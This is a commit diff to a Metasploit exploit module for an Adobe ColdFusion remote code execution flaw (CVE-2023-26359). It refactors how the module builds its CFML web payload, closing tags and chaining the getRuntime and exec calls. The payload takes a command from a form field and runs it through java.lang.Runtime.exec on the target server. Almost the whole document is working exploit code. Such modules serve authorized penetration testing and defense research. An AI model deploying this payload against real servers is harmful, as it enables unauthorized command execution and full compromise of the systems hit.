close all CMFL tags and chain the getRuntime and exec calls for berevity

modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb

@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>"
 
     # Set our cf_param with the data in the requests form data, this is the command to run.
-    cfc_payload << "<cfset #{cf_param}=form.#{cf_param}>"
+    cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>"
 
     # Here we construct a CFML payload to stage the :cmd and :dropper commands...
     shell_name = nil
@@ -173,22 +173,15 @@ class MetasploitModule < Msf::Exploit::Remote
     cf_array = Rex::Text.rand_text_alpha_lower(4)
 
     # Create an array of arguments to pass to exec()
-    cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]>"
+    cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>"
 
     cf_runtime = Rex::Text.rand_text_alpha_lower(4)
 
     # Get a reference to the java.lang.Runtime class.
-    cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'>"
+    cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>"
 
-    cf_rt = Rex::Text.rand_text_alpha_lower(4)
-
-    # Call the static getRuntime method.
-    cfc_payload << "<cfset #{cf_rt} = #{cf_runtime}.getRuntime()>"
-
-    cf_res = Rex::Text.rand_text_alpha_lower(4)
-
-    # Use exec() to execute our string array holding the command and the arguments.
-    cfc_payload << "<cfset #{cf_res} = #{cf_rt}.exec(#{cf_array})>"
+    # Call the static Runtime.exec method to execute our string array holding the command and the arguments.
+    cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>"
 
     # The end of the If tag.
     cfc_payload << '</cfif>'